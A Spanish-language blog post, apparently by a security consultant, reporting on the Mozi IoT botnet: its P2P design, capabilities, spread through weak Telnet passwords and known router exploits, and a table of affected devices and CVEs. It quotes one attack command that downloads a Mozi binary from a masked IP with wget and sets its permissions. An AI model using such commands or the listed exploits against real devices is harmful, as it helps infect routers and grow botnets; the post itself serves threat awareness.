Saltar al contenido

La botnet Mozi genera casi todo el tráfico IoT de Internet

Mozi es el nombre con que se conoce a una botnet o red de ordenadores subyugados y utilizados para operaciones masivas de ciberataque. Comparte código con Mirai y Gafgyt, apareciendo por primera vez a finales de 2019.

La red Mozi fue descubierta por 260 Netlab, y en aquel entonces sus objetivos eran equipamiento de red (routers) de las firmas D-Link, Netgear y Huawei. Lo que hacía era probar combinaciones débiles de credenciales para intentar forzar el acceso mediante Telnet.

Parece ser que, durante el final de 2019, la botnet estuvo implicada principalmente en ataques de tipo DDoS (Denegación de Servicio Distribuída). Implementa un protocolo personalizado de Tabla de Hash Distribuída que proporciona un servicio parecido a una tabla de hash ([clave, valor]).

La botnet MOzi emplea el protocolo DHT para construir una red P2P y utiliza ECDSA384 y el algoritmo XOR para garantizar la integridad y seguridad de sus componentes y red P2P.

La muestra se distribuye mediante Telnet con contraseñas poco seguras y algunos exploit ya conocidos. En términos de funciones, las instrucciones de cada nodo en la botnet MOzi son dirigidos por un payload denominado Config, generado por el Botnet Master.

Informe de Netlab

Hablando en cristiano, esta configuración le permite, usando el protocolo DHT, añadir o eliminar nodos de la red de bots sin apenas esfuerzo y sin generar nuevas claves.

Una vez obtenido el acceso al router en cuestión, el bot intenta ejecutar un payload o “carga” maliciosa, para que entre a formar parte de la red. Entre las capacidades de esta red tenemos:

  • Ataques DDoS
  • Recopilar información del anfitrión
  • Ejecutar payload en URL especificada
  • Actualizar la muestra desde URL especificada
  • Ejecutar comandos en el sistema

Mozi genera en torno al 90% del tráfico de internet (IoT)

Al menos entre los meses de Octubre de 2019 y Junio de 2020, la red de bots ha sido responsable de generar el 90% de IoTs en Internet. Es algo realmente sorprendente, sobre todo teniendo en cuenta que este bot no intenta eliminar otros bots competidores de los sistemas donde opera.

Los expertos cifran a día de hoy en unos 31 millones, la cifra total de dispositivos IoT (esos aparatos “Inteligentes” que tenemos por casa o en el curro) y la tasa de instalación es de 127 dispositivos por segundo!

Esto, evidentemente, garantiza que la superficie de exposición es altísima y explica el por qué no deja de expandirse esta amenaza.

Los ataques de inyección de comandos (command injection) son bastante comunes en estos aparatos, normalmente se inician a través de un comando wget y posteriormente alterando los permisos locales, para poder interactuar con el sistema atacado.

En ataques recientes se ha utilizado el siguiente comando para determinar si el dispositivo es vulnerable a un ataque de Command Injection.

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Nuestro análisis indica que esta muestra en particular se ejecuta en microprocesadores sin arquitectura MIPS (Microprocessor Interlocked Pipelined Stages). Es una extensión entendida por los procesadores que ejecutan arquitectura RISC (Reduced Instruction Set Computer), algo preeminente en IoTs.

Una vez el ataque tiene éxito y el atacante obtiene acceso completo al sistema usando la botnet, el firmware puede modificarse y añadir nuevas muestras de malware que hagan “sus cosas”.

Esta es la lista de dispositivos afectados:

DISPOSITIVO AFECTADOVULNERABILIDAD
Eir D1000 RouterEir D1000 Wireless Router RCI
Vacron NVR devicesVacron NVR RCE
Devices using the Realtek SDKCVE-2014-8361
Netgear R7000 and R6400Netgear cig-bin Command Injection
DGN1000 Netgear routersNetgear setup.cgi unauthenticated RCE
MVPower DVRJAWS Webserver unauthenticated shell command execution
Huawei Router HG532CVE-2017-17215
D-Link DevicesHNAP SoapAction-Header Command Execution
GPON RoutersCVE-2018-10561, CVE-2018-10562
D-Link DevicesUPnP SOAP TelnetD Command Execution
CCTV DVRCCTV/DVR Remote Code Execution

Los expertos de IBM han descubierto que la infraestructura principal de Mozi está ubicada en China, con el 84% del total. En este informe de IBM puedes consultar más detalles sobre la botnet y los IOC.

Palabras finales

No es la primera vez que los routers son víctimas de exploits en alguna implementación de sus protocolos, algo a lo que no ayuda que cometamos fallos en la configuración. Si tienes dudas, te recomiendo leer la guía con pasos para proteger tu router doméstico.

Categorías

Noticias

Etiquetas

, , , , , ,

Alejandro Ver todo

Trabajo como consultor de ciberseguridad y me gusta lo que hago. Aficionado a la informática / tecnología en general, me gusta compartir con la gente lo poco que sé. También soy aficionado al deporte y los videojuegos.

Deja tu comentario (puedes hacerlo de forma anónima)

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios .

A %d blogueros les gusta esto: